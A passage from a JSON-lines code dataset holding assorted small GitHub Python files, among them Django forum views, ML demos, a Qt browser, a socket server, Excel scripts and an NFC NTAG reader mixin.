-1\ngame.on_update_interval(500, on_update_interval3)","repo_name":"pythongamerexe/space-wars","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5165,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"23621832376","text":"#!/usr/bin/env python3\n\"\"\" module \"\"\"\nimport numpy as np\n\n\ndef play(env, Q, max_steps=100):\n \"\"\"trained agent play an episode\"\"\"\n env.reset()\n state = 0\n env.render()\n for i in range(max_steps):\n action = np.argmax(Q[state, :])\n state, reward, done, _ = env.step(action)\n env.render()\n if done:\n break\n return reward\n","repo_name":"vandeldiegoc/holbertonschool-machine_learning","sub_path":"reinforcement_learning/0x00-q_learning/4-play.py","file_name":"4-play.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"29543563501","text":"import time\n\n\nsessions = {}\n\n\ndef find_or_create_session(id_):\n \"\"\"\n This function returns the client session with Wit context included if one\n exists, or it returns a newly created session\n\n :param id_: A Facebook ID\n :return: str\n \"\"\"\n new_session = False\n session_id = \"\"\n\n # search the global sessions for the given Facebook ID\n for key in sessions.iterkeys():\n if sessions[key][\"id\"] == id_:\n session_id += key\n\n # if no session exists, let's create one\n if session_id is \"\":\n new_session = True\n # the session is created by taking th current epoch time in seconds,\n # and concatenating the given Facebook ID\n session_id += str(int(time.time())) + id_\n sessions[session_id] = {\n \"id\": id_,\n \"context\": {}\n }\n\n return session_id, new_session\n\n\ndef main():\n pass\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"harrylewis/travel-assistant-bot","sub_path":"sessions.py","file_name":"sessions.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"15317573724","text":"from django.contrib.auth.decorators import login_required\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.views.decorators.http import require_GET, require_POST\n\nfrom glass.forms import UserForm, TopicForm, MessageForm\nfrom glass.models import User, Tag, Topic, Message\n\n@require_GET\ndef index(request):\n \"\"\"\n Index page of the project.\n\n The page presents list of popular topics ordered by default by number of\n “likes”. Pagination, search.\n \"\"\"\n page_size = request.GET.get('page_size', 5)\n page = request.GET.get('page', 1)\n tag = request.GET.get('tag')\n search = request.GET.get('search')\n tm = Topic.objects\n topics = tm.filter(tags__in=[tag]) if tag else tm.all()\n if search:\n topics = topics.filter(title__contains=search)\n # FIXME The following processing logic assumes that relatively small\n # (maybe a few hundreds) number of topics is returned by ‘topic’ query\n # set. This may be *quite* slow if the data base contains lots of\n # topics. If this is the case, we could add ‘initial_message’ foreign\n # key field to ‘Topic’ model and use it to sort topics on data base\n # level. Other solutions would involve lower level of interaction with\n # the data base and thus may lock the application into using of\n # particular back-end, which is often bad design.\n topics = sorted(list(topics),\n key=lambda x: x.initial_message().likes(),\n reverse=True)\n context = {}\n if topics:\n paginator = Paginator(topics, page_size)\n num_pages = paginator.num_pages\n try:\n p = paginator.page(page)\n except PageNotAnInteger:\n contacts = paginator.page(1)\n except EmptyPage:\n p = paginator.page(num_pages)\n context['page'] = p\n # Range of page links to show, we should take care of situations\n # when there are too many pages:\n page_range = range(max(1, p.number - 4),\n min(num_pages, p.number + 4) + 1)\n context['page_range'] = page_range\n context['num_pages'] = num_pages\n else:\n context['page'] = None\n return render(request, 'glass/index.html', context=context)\n\ndef about(request):\n \"\"\"\n About page, nothing special.\n \"\"\"\n return render(request, 'glass/about.html')\n\ndef topic(request, slug):\n \"\"\"\n Topic-dedicated page.\n\n This displays all messages in order and allows registered users to post\n new messages. This page features anchor links per message and ability to\n edit or delete last posted message for its author. Messages can be\n “liked” too and this is reversible.\n \"\"\"\n topic = get_object_or_404(Topic, slug=slug)\n messages = Message.objects.filter(topic=topic)\n context = {'topic': topic,\n 'form': MessageForm(),\n 'messages': messages}\n if request.user.is_authenticated():\n if request.method == 'POST':\n msg_form = MessageForm(request.POST)\n if msg_form.is_valid():\n message = msg_form.save(commit=False)\n message.author = request.user\n message.topic = topic\n message.save()\n msg_form.save_m2m()\n return redirect('topic', slug=slug)\n else:\n context['form'] = msg_form # render errors\n return render(request, 'glass/topic.html', context)\n\n@login_required\ndef new_topic(request):\n \"\"\"\n Creation of new topics.\n\n This is mainly about processing of ‘TopicForm’ and ‘MessageForm’, since\n every topic must have initial message.\n \"\"\"\n if request.method == 'GET':\n context = {'topic_form': TopicForm(prefix='topic'),\n 'msg_form': MessageForm(prefix='msg')}\n elif request.method == 'POST':\n topic_form = TopicForm(request.POST, prefix='topic')\n msg_form = MessageForm(request.POST, prefix='msg')\n context = {'topic_form': topic_form,\n 'msg_form': msg_form}\n if topic_form.is_valid():\n new_topic = topic_form.save()\n if msg_form.is_valid():\n new_msg = msg_form.save(commit=False)\n new_msg.author = request.user\n new_msg.topic = new_topic\n new_msg.save()\n msg_form.save_m2m()\n return redirect('topic', slug=new_topic.slug)\n return render(request, 'glass/new-topic.html', context=context)\n\n@login_required\ndef user(request, username):\n \"\"\"\n User profile.\n\n Every registered user can see all profiles, but only his own profile is\n editable for him. This page also displays latest messages authored by\n the user.\n \"\"\"\n user = get_object_or_404(User, username=username)\n latest_msgs = Message.objects.filter(author=user).order_by('-id')[:5]\n context = {'this_user': user, 'latest_msgs': latest_msgs}\n if request.user == user:\n if request.method == 'GET':\n context['form'] = UserForm(instance=user)\n elif request.method == 'POST':\n form = UserForm(request.POST, instance=user)\n if form.is_valid():\n form.save()\n else: # if form is invalid, render it to show messages\n context['form'] = form\n return render(request, 'glass/user.html', context=context)\n\ndef carefully_get_msg(request):\n \"\"\"\n Return message according to parameters in ‘request’ or ‘None’. Request\n should contain parameter named ‘msg_id’ identifying the message.\n \"\"\"\n user = request.user\n if not user.is_authenticated():\n return None\n msg_id = request.GET.get('msg_id')\n if not msg_id:\n return None\n try:\n msg = Message.objects.get(id=msg_id)\n except Message.DoesNotExist:\n return None\n return msg\n\n@require_GET\ndef msg_like(request):\n \"\"\"\n This is how users can like messages.\n\n Invoked by Java Script from topic page.\n \"\"\"\n msg = carefully_get_msg(request)\n if not msg:\n return HttpResponse('0')\n if msg.likers.filter(username=request.user.username).exists():\n msg.likers.remove(request.user)\n else:\n msg.likers.add(request.user)\n msg.save()\n return HttpResponse(str(msg.likes()))\n\n@require_GET\ndef msg_del(request):\n \"\"\"\n Deletion of message.\n\n Quite obviously, it deletes messages. Only last message in thread can be\n deleted and only by its author. Staff can delete everything, of course.\n \"\"\"\n msg = carefully_get_msg(request)\n topic = msg.topic\n if not msg or not msg.editable_by(request.user):\n return HttpResponse('')\n msg.delete()\n # if this is the single message in topic, delete topic:\n if not Message.objects.filter(topic=topic).exists():\n topic.delete()\n return HttpResponse(\"deleted\")\n","repo_name":"mrkkrp/glass","sub_path":"glass/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7082,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"15500299977","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import datasets\nfrom sklearn.preprocessing import PolynomialFeatures, StandardScaler\nfrom sklearn.svm import LinearSVC\nfrom sklearn.pipeline import Pipeline\nfrom LogisticRegression.drawDecisionBoundary import plot_decision_boundary\nfrom sklearn.svm import SVC\n\n\ndef PolynomiaSVC(degree, C=1.0):\n return Pipeline([\n ('poly', PolynomialFeatures(degree=degree)),\n ('std_scaler', StandardScaler()),\n ('linearSVC', LinearSVC(C=C))\n ])\n\ndef PolynomialKernelSVC(degree, C=1.0):\n return Pipeline([\n ('std_scaler', StandardScaler()),\n ('kernelSVC', SVC(kernel='poly', degree=degree, C=C))\n ])\n\nif __name__ == \"__main__\":\n\n # 使用skleran生成数据\n X, y = datasets.make_moons(noise=0.15, random_state=666)\n\n # 绘制数据集图像\n plt.scatter(X[y==0, 0], X[y==0, 1])\n plt.scatter(X[y==1, 0], X[y==1, 1])\n plt.show()\n\n # 使用多项式特征的SVM\n poly_svc = PolynomiaSVC(degree=3)\n poly_svc.fit(X, y)\n\n # 绘制决策边界\n plot_decision_boundary(poly_svc, axis=[-1.5, 2.5, -1.0, 1.5])\n plt.scatter(X[y==0, 0], X[y==0, 1])\n plt.scatter(X[y==1, 0], X[y==1, 1])\n plt.show()\n\n # 使用多项式核函数的SVM\n poly_kernel_svc = PolynomiaSVC(degree=3)\n poly_kernel_svc.fit(X, y)\n\n # 绘制决策边界\n plot_decision_boundary(poly_kernel_svc, axis=[-1.5, 2.5, -1.0, 1.5])\n plt.scatter(X[y==0, 0], X[y==0, 1])\n plt.scatter(X[y==1, 0], X[y==1, 1])\n plt.show()","repo_name":"ediltwwj/MachinelLearning","sub_path":"SVM/sklearnSvm2.py","file_name":"sklearnSvm2.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"9052856933","text":"\"\"\"MasterTherm Sensor Tests.\"\"\"\nfrom unittest.mock import patch\nimport pytest\n\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.const import Platform, UnitOfTemperature\n\nfrom pytest_homeassistant_custom_component.common import MockConfigEntry\nfrom custom_components.mastertherm.const import (\n DOMAIN,\n MasterthermSensorEntityDescription,\n)\n\nfrom .conftest import APIMock\n\n\n@pytest.fixture(autouse=True)\ndef override_entity():\n \"\"\"Override the ENTITIES to test Sensors.\"\"\"\n with patch(\n \"custom_components.mastertherm.ENTITIES\",\n {MasterthermSensorEntityDescription.__name__: Platform.SENSOR},\n ), patch(\n \"custom_components.mastertherm.coordinator.ENTITIES\",\n {MasterthermSensorEntityDescription.__name__: Platform.SENSOR},\n ):\n yield\n\n\nasync def test_sensor_setup(\n hass: HomeAssistant,\n mock_configdata: dict,\n):\n \"\"\"Test Sensors are Created and Updated.\"\"\"\n # Setting up using Mock requires the actual config not the Domain\n # changed the way the test works to send without domain.\n api_mock = APIMock()\n entry = MockConfigEntry(domain=DOMAIN, data=mock_configdata[DOMAIN])\n entry.add_to_hass(hass)\n\n with patch(\n \"custom_components.mastertherm.config_flow.authenticate\",\n return_value={\"status\": \"success\"},\n ), patch(\n \"custom_components.mastertherm.coordinator.MasterthermController.connect\",\n side_effect=api_mock.connect,\n ), patch(\n \"custom_components.mastertherm.coordinator.MasterthermController.refresh\",\n side_effect=api_mock.refresh,\n ), patch(\n \"custom_components.mastertherm.coordinator.MasterthermController.get_devices\",\n side_effect=api_mock.get_devices,\n ), patch(\n \"custom_components.mastertherm.coordinator.MasterthermController.get_device_data\",\n side_effect=api_mock.get_device_data,\n ):\n await hass.config_entries.async_setup(entry.entry_id)\n await hass.async_block_till_done()\n\n # Check we called the Mock and we have a Sensor.\n assert (\n hass.states.async_entity_ids_count(Platform.SENSOR) > 0\n ), \"Sensors Failed to Create\"\n\n # Check the Temperature Sensor\n state = hass.states.get(\"sensor.mt_1234_1_outside_temp\")\n assert state.state == \"4.9\"\n assert state.name == \"Outside Temperature\"\n assert state.attributes.get(\"unit_of_measurement\") == UnitOfTemperature.CELSIUS\n","repo_name":"sHedC/homeassistant-mastertherm","sub_path":"tests/test_sensor.py","file_name":"test_sensor.py","file_ext":"py","file_size_in_byte":2423,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"36"} +{"seq_id":"19725361992","text":"\"\"\"\n \t*************************** \n \t--------EveIDE_LIGHT-------- \n \t Author: Adancurusul\n \t Date: 2021-07-12 10:28:27\n \t LastEditors: Adancurusul\n \t LastEditTime: 2021-07-31 14:08:36\n \t Github: https://github.com/Adancurusul\n \t Email: adancurusul@gmail.com\n\n \t***************************\n \"\"\"\nimport sys\nfrom qtpy.QtCore import Qt, QUrl\nfrom qtpy.QtGui import QIcon\nfrom qtpy.QtWebEngineWidgets import QWebEngineView\nfrom qtpy.QtWidgets import QApplication, QWidget, QPushButton, QLineEdit, QVBoxLayout, QHBoxLayout\n\n\nclass Demo(QWidget):\n def __init__(self):\n super(Demo, self).__init__()\n self.resize(1000, 600)\n\n self.back_btn = QPushButton(self)\n self.forward_btn = QPushButton(self)\n self.refresh_btn = QPushButton(self)\n self.zoom_in_btn = QPushButton(self)\n self.zoom_out_btn = QPushButton(self)\n self.url_le = QLineEdit(self)\n\n self.browser = QWebEngineView()\n \n self.h_layout = QHBoxLayout()\n self.v_layout = QVBoxLayout()\n\n self.layout_init()\n self.btn_init()\n self.le_init()\n self.browser_init()\n\n def layout_init(self):\n self.h_layout.setSpacing(0)\n self.h_layout.addWidget(self.back_btn)\n self.h_layout.addWidget(self.forward_btn)\n self.h_layout.addWidget(self.refresh_btn)\n self.h_layout.addStretch(2)\n self.h_layout.addWidget(self.url_le)\n self.h_layout.addStretch(2)\n self.h_layout.addWidget(self.zoom_in_btn)\n self.h_layout.addWidget(self.zoom_out_btn)\n\n self.v_layout.addLayout(self.h_layout)\n self.v_layout.addWidget(self.browser)\n\n self.setLayout(self.v_layout)\n\n def browser_init(self):\n self.browser.load(QUrl('https://baidu.com'))\n self.browser.urlChanged.connect(lambda: self.url_le.setText(self.browser.url().toDisplayString()))\n\n def btn_init(self):\n self.back_btn.setIcon(QIcon('images/back.png'))\n self.forward_btn.setIcon(QIcon('images/forward.png'))\n self.refresh_btn.setIcon(QIcon('images/refresh.png'))\n self.zoom_in_btn.setIcon(QIcon('images/zoom_in.png'))\n self.zoom_out_btn.setIcon(QIcon('images/zoom_out.png'))\n\n self.back_btn.clicked.connect(self.browser.back)\n self.forward_btn.clicked.connect(self.browser.forward)\n self.refresh_btn.clicked.connect(self.browser.reload)\n self.zoom_in_btn.clicked.connect(self.zoom_in_func)\n self.zoom_out_btn.clicked.connect(self.zoom_out_func)\n\n def le_init(self):\n self.url_le.setFixedWidth(400)\n self.url_le.setPlaceholderText('Search or enter website name')\n\n def keyPressEvent(self, QKeyEvent):\n if QKeyEvent.key() == Qt.Key_Return or QKeyEvent.key() == Qt.Key_Enter:\n if self.url_le.hasFocus():\n if self.url_le.text().startswith('https://') or self.url_le.text().startswith('http://'):\n self.browser.load(QUrl(self.url_le.text()))\n else:\n self.browser.load(QUrl('https://'+self.url_le.text()))\n\n def zoom_in_func(self):\n self.browser.setZoomFactor(self.browser.zoomFactor()+0.1)\n\n def zoom_out_func(self):\n self.browser.setZoomFactor(self.browser.zoomFactor()-0.1)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n demo = Demo()\n demo.show()\n sys.exit(app.exec_())","repo_name":"Adancurusul/EveIDE_LIGHT","sub_path":"source/webWidget.py","file_name":"webWidget.py","file_ext":"py","file_size_in_byte":3388,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"36"} +{"seq_id":"34346025720","text":"#coding=utf-8\n\n# 查找不存在的商家编码\nimport sys\nimport openpyxl\nimport os\nimport user_input\nimport merge_sheet\nimport present\n\nif __name__ == \"__main__\":\n present.use_des()\n print(\"开始处理\\n\")\n\n wb = merge_sheet.load_spec_file(user_input.file_name_original)\n\n # 输出数据的sheet名\n output_sheet_name = \"不存在的商家编码\"\n\n all_sheet_name = wb.get_sheet_names()\n output_sheet = None\n if output_sheet_name not in all_sheet_name:\n print(\"%s不存在, 创建它\" % (output_sheet_name))\n output_sheet = wb.create_sheet(output_sheet_name)\n else:\n print(\"%s已经存在, 先删除它, 再创建它\" % (output_sheet_name))\n wb.remove_sheet(wb[output_sheet_name])\n output_sheet = wb.create_sheet(output_sheet_name)\n\n \"\"\"\n print(\"%s已经存在\" % (output_sheet_name))\n output_sheet = wb[output_sheet_name]\n \"\"\"\n\n # 计算出所有的商家编码\n all_business_no = {}\n cells = merge_sheet.cal_column_cell(wb[\"Sheet2\"], \"j\", 2)\n for cell in cells:\n if cell.value not in all_business_no:\n all_business_no[cell.value] = 1\n all_business_no = all_business_no.keys()\n # print(\"\\n\\nall_business_no = %r\\n\\n\" % (all_business_no))\n\n # 计算出当前存在的商家编码\n existent_business_no = {}\n cells = merge_sheet.cal_column_cell(wb[\"Sheet4\"], \"a\", 2)\n for cell in cells:\n if cell.value not in existent_business_no:\n existent_business_no[cell.value] = 1\n existent_business_no = existent_business_no.keys()\n # print(\"\\n\\nexistent_business_no = %r\\n\\n\" % (existent_business_no))\n\n # 计算出不存在的商家编码\n inexistent_business_no = {}\n for value in all_business_no:\n if value not in existent_business_no:\n if value not in inexistent_business_no:\n inexistent_business_no[value] = 1\n print(\"value = %r, 不存在\" % (value))\n inexistent_business_no = inexistent_business_no.keys()\n print(\"\\n\\ninexistent_business_no = %r\\n\\n\" % (inexistent_business_no))\n\n # 输出数据\n output_sheet.cell(\"a1\").value = \"不存在的商家编码\"\n i = 2\n for value in inexistent_business_no:\n cell_to_do = output_sheet.cell(\"a%d\" % (i))\n cell_to_do.value = value\n i += 1\n\n wb.save(user_input.file_name_original)\n present.after_process()\n\n","repo_name":"lisifenggithub/process_excel","sub_path":"find_inexistent_business_no.py","file_name":"find_inexistent_business_no.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"35111516325","text":"from . import views\nfrom django.urls import path\n\n# List of all url patterns\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"homes\", views.home, name=\"home\"),\n path(\"main_menu\", views.main_menu, name=\"main_menu\"),\n path(\"contact_us\", views.contact_us, name=\"contact_us\"),\n path(\"change_price\", views.change_price, name=\"change_price\"),\n path(\"change_rate\", views.change_rate, name=\"change_rate\")\n]\n","repo_name":"karimammar135/forn_el_batoul","sub_path":"forn_el_batoul/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"29247588088","text":"#!/usr/bin/env python\n\n# server program for client (tut_sock_client.py) sending requests with\n# sockets (asynchronous network programming);\n# see http://asyncoro.sourceforge.net/tutorial.html for details.\n\n# run this program and then client either on same node. If they are on\n# different computers, 'host' address must be changed appropriately.\n\nimport sys, socket\nimport asyncoro\n\ndef process(conn, coro=None):\n global n\n if sys.version_info.major >= 3:\n eol = ord('/')\n else:\n eol = '/'\n data = ''.encode()\n while True:\n data += yield conn.recv(128)\n if data[-1] == eol:\n break\n conn.close()\n n += 1\n print('recieved: %s' % data)\n\ndef server(host, port, coro=None):\n coro.set_daemon()\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock = asyncoro.AsyncSocket(sock)\n # sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n sock.bind((host, port))\n sock.listen(128)\n\n while True:\n conn, addr = yield sock.accept()\n asyncoro.Coro(process, conn)\n\nn = 0\nasyncoro.Coro(server, '127.0.0.1', 8010)\n\nif sys.version_info.major > 2:\n read_input = input\nelse:\n read_input = raw_input\nwhile True:\n cmd = read_input().strip().lower()\n if cmd == 'exit' or cmd == 'quit':\n break\nprint('n = %d' % n)\n","repo_name":"pgiri/asyncoro","sub_path":"examples/tut_sock_server.py","file_name":"tut_sock_server.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"36"} +{"seq_id":"6118513573","text":"import random\nfrom bs4 import BeautifulSoup\nimport requests\n\n\ndef get_xkcd_photo(index=None):\n idx = index or random.randint(0, 1900)\n r = requests.get(\"https://xkcd.com/{}/\".format(idx))\n\n return get_image(r.text)\n\n\ndef get_image(html_doc):\n obj = BeautifulSoup(html_doc, 'html.parser')\n return \"http:\"+obj.find(id=\"comic\").find('img').get('src')\n\n\nif __name__ == \"__main__\":\n print(get_xkcd_photo())\n","repo_name":"andrea-lascola/SimpleChatbot","sub_path":"app/modules/photo/xkcd.py","file_name":"xkcd.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"9859660569","text":"import numpy as np\nfrom pg import discount_rewards\n\ndef memory_stack(memory, num_process, state_space, action_space):\n memory = np.array(memory)\n state, action, reward = np.empty(shape=[0, state_space]), np.empty(shape=[0, action_space]), np.empty(shape=[0, 1])\n for i in range(num_process):\n state_stack, action_stack, reward_stack = np.empty(shape=[0, state_space]), np.empty(shape=[0, action_space]), np.empty(shape=[0, 1])\n for j in range(memory.shape[0]):\n if type(memory[j][1][i]) != str:\n state_stack = np.vstack([state_stack, memory[j][0][i]])\n action_stack = np.vstack([action_stack, memory[j][1][i]])\n reward_stack = np.vstack([reward_stack, memory[j][2][i]])\n discounted_stack = discount_rewards(reward_stack)\n state = np.vstack([state, state_stack])\n action = np.vstack([action, action_stack])\n reward = np.vstack([reward, discounted_stack])\n return state, action, reward\n\ndef hot_action(actions, num_process, action_space):\n action_list = []\n for action in actions:\n if action == 'done':\n a = 'done'\n else:\n a = np.zeros(action_space)\n a[action] = 1\n action_list.append(a)\n return action_list\n\ndef get_action(pg, each_terminal, num_process, state):\n actions = []\n for i in range(num_process):\n if not each_terminal[i]:\n actions.append(pg.choose_action([state[i]]))\n else:\n actions.append('done')\n return actions\n\ndef check_reward(info, num_process):\n data, reward = [], []\n for i in info:\n data.append(list(i))\n for d in data:\n reward.append(d[1])\n return reward\n\ndef check_state(info, num_process):\n data, state = [], []\n for i in info:\n data.append(list(i))\n for d in data:\n state.append(d[0])\n return state\n\ndef check_done(info, num_process):\n data, done, all_done = [], [], False\n for i in info:\n data.append(list(i))\n for d in data:\n done.append(d[2])\n if sum(list(map(int, done))) == num_process:\n all_done = True\n return done, all_done","repo_name":"chagmgang/synch_pysc2","sub_path":"synchronized_PG/trans.py","file_name":"trans.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"4061083208","text":"#!/usr/bin/env python\n# coding=utf-8\n\"\"\"\n\n@athor:weifeng.guo \n@data:2019/1/7 14:44\n@filename:pandas_read_and_write_excel\n\n\"\"\"\nimport pandas as pd\nimport sys\ninput_file = sys.argv[1]\noutput_file = sys.argv[2]\ndata_frame = pd.read_excel(input_file, sheetname='january_2013')\nwriter = pd.ExcelWriter(output_file)\ndata_frame.to_excel(writer, sheet_name='jan_13_output', index=False)\nwriter.save()","repo_name":"guoweifeng216/python","sub_path":"liyong_python_jingxing_shujufenxi/python_basic/chapter3/pandas_read_and_write_excel.py","file_name":"pandas_read_and_write_excel.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"43844792479","text":"# Guess Number 🔢\n# Codédex\n\nguess = 0\ntries = 0\n\nwhile guess != 6 and tries < 5:\n guess = int(input('Guess the number: '))\n tries = tries + 1\n\nif guess != 6:\n print('You ran out of tries.')\nelse:\n print('You got it!')\n","repo_name":"codedex-io/python-101","sub_path":"4-loops/18_guess_number.py","file_name":"18_guess_number.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","stars":168,"dataset":"github-code","pt":"36"} +{"seq_id":"40272870440","text":"\n# Prepare data\nwith open(\"day07.txt\", \"r\") as f:\n data = f.read().splitlines()\ndata = data[0].split(\",\")\ndata = [int(d) for d in data]\n# Sort and find the median\ndata.sort()\nmedian = data[len(data) // 2]\n# Calculate fuel for part 1\nfuel = 0\nfor n in data:\n diff = abs(n-median)\n print(\"adding \",n,\"diff\",diff)\n fuel += diff\nprint(fuel)\n\ndef triangular(n):\n return n * (n+1) / 2\n\nresults = []\nlowestfuel = 999999999999\nlowestfueli = 0\nfor objective in range(0,1899):\n fueltotal=0\n for n in data:\n fuelindividual = triangular(abs(n-objective)) # 1 +2 +3 +4 +5 ,,, 1 3 6 10 15\n fueltotal += fuelindividual\n # print(\"For element\",n,\"fuel\",fuelindividual)\n print(objective,fueltotal)\n if fueltotal < lowestfuel:\n lowestfuel = fueltotal\n lowestfueli = objective\n results.append((objective,fueltotal))\nprint(\"optimal position\",lowestfueli, \"requires lowest fuel\",lowestfuel)\n\n","repo_name":"paulbaumgarten/advent-of-code","sub_path":"2021/day07.py","file_name":"day07.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"36"} +{"seq_id":"26606763909","text":"t=int(input())\n\na=300\nb=60\nc=10\n\ntime=[a,b,c]\nresult=[]\n\nfor sec in time:\n ans=0\n ans+=t//sec\n t%=sec\n result.append(ans)\n\nif t==0:\n print(*result)\nelse:\n print(-1)\n\n \n \n","repo_name":"realme1st/Algorithm-study","sub_path":"Baekjoon/그리디/전자레인지 (10162).py","file_name":"전자레인지 (10162).py","file_ext":"py","file_size_in_byte":194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"1699505213","text":"import torch\nimport torch.nn as nn\nfrom transformers import AutoModel, AutoTokenizer\nfrom transformers.models.deberta_v2.modeling_deberta_v2 import *\n\n\nclass RobertaWrapper(nn.Module):\n def __init__(self, device, n_classes, truncation_list = None):\n super().__init__()\n self.truncation_list = truncation_list\n self.model = AutoModel.from_pretrained(\"roberta-base\")\n self.tokenizer = AutoTokenizer.from_pretrained(\"roberta-base\")\n self.classifier = nn.Linear(768, n_classes)\n self.device = device\n\n def forward(self, input_texts):\n input_batch = self.tokenizer(input_texts, padding=True, truncation=True, return_tensors=\"pt\")\n input_batch = {key: tensor.to(self.device) for key, tensor in input_batch.items()}\n if self.truncation_list is None:\n output = self.model(**input_batch).last_hidden_state\n output = torch.mean(output, dim=1)\n return self.classifier(output)\n else:\n input_tokens = input_batch['input_ids']\n embeds = self.model.embeddings(input_tokens)\n total_length = embeds.shape[1]\n for i in range(len(self.truncation_list)):\n output = self.model.encoder.layer[i](embeds)[0]\n cur_length = max(1, int(self.truncation_list[i] * total_length))\n output = output[:, :cur_length, :]\n output = torch.mean(output, dim=1)\n return self.classifier(output)\n","repo_name":"faaaaaaaaaaaaakeacc/effective_sequence_compression","sub_path":"effective_sequence_compression/models/roberta.py","file_name":"roberta.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"1991795328","text":"import binascii\n\nfrom .card import nfc_tlv_parse, CardError\n\n\nclass NtagMixin:\n def fast_read(self, start, end):\n length = (end + 1 - start) * 4\n return self.communicatethru([0x3A, start, end], response_length=length)\n\n def read_cnt(self, counter):\n response = self.communicatethru([0x39, counter], response_length=3)\n if response:\n return int.from_bytes(response, \"little\")\n return None\n\n def read_sig(self):\n return self.communicatethru([0x3C, 0x00], response_length=32)\n\n def pwd_auth(self, pwd):\n # pwd should be 4 bytes\n return self.communicatethru(b\"\\x1B\" + pwd, response_length=2)\n\n @property\n def ntag_version(self):\n return self.version\n\n @property\n def ntag_model(self):\n return self.model\n\n @property\n def ntag_signature(self):\n if \"ntag_signature\" in self.data:\n return self.data[\"ntag_signature\"]\n try:\n self.data[\"ntag_signature\"] = self.read_sig()\n return self.data[\"ntag_signature\"]\n except CardError:\n return None\n\n @property\n def ntag_data(self):\n if \"ntag_data\" in self.data:\n return self.data[\"ntag_data\"]\n if self.ntag_version is None:\n return None\n version_map = {\n b\"\\x00\\x04\\x04\\x02\\x01\\x00\\x0F\\x03\": 0x2C,\n b\"\\x00\\x04\\x04\\x02\\x01\\x00\\x11\\x03\": 0x86,\n b\"\\x00\\x04\\x04\\x02\\x01\\x00\\x13\\x03\": 0xE6,\n b\"\\x00\\x04\\x04\\x04\\x01\\x00\\x0F\\x03\": 0x2C,\n b\"\\x00\\x04\\x04\\x04\\x01\\x00\\x11\\x03\": 0x86,\n b\"\\x00\\x04\\x04\\x04\\x01\\x00\\x13\\x03\": 0xE6,\n }\n try:\n max_block = version_map[self.ntag_version]\n except KeyError:\n return None\n read_blocks = 56\n data = b\"\"\n for block_start in range(0, max_block, read_blocks):\n block_end = min(block_start + read_blocks, max_block)\n try:\n response = self.fast_read(block_start, block_end)\n except CardError:\n return None\n if response:\n data = data + response\n else:\n return None\n self.data[\"ntag_data\"] = data\n return self.data[\"ntag_data\"]\n\n @property\n def ntag_counter(self):\n if \"ntag_counter\" in self.data:\n return self.data[\"ntag_counter\"]\n try:\n # read block zero to ensure that counter is incremented\n # self.communicatethru([0x3A, 0, 0], response_length=4)\n self.fast_read(0, 0)\n count = self.read_cnt(2)\n if count is not None:\n self.data[\"ntag_counter\"] = count\n return count\n except CardError:\n return None\n\n @property\n def ntag_ndef(self):\n if self.ntag_data is None:\n return None\n cc = self.ntag_data[12:16]\n data = self.ntag_data[16:]\n if cc[0] == 0xE1:\n version = cc[1]\n data_area_size = cc[2] * 8\n read_access = cc[3] >> 4\n write_access = cc[3] & 0x0F\n # print(\"cc\", binascii.hexlify(cc, \" \"))\n # print(\" version {}.{}\".format(version >> 4, version & 0x0F))\n # print(\" data area size {}\".format(data_area_size))\n # print(\" read access {}\".format(read_access))\n # print(\" write access {}\".format(write_access))\n # if len(data) < data_area_size:\n # print(\"fetching more data\")\n # nblocks = (data_area_size - len(data)) / 4\n # data = data + self.read_blocks(7, 6 + nblocks)\n # print(\"data\", data)\n messages = []\n terminated = False\n # print(data)\n for t, l, v in nfc_tlv_parse(data):\n # print(\"tlv\", t, l, v)\n if t == 0xFE:\n terminated = True\n break\n if t == 0x03:\n messages.append(v)\n if not terminated:\n print(\"missing data\")\n return 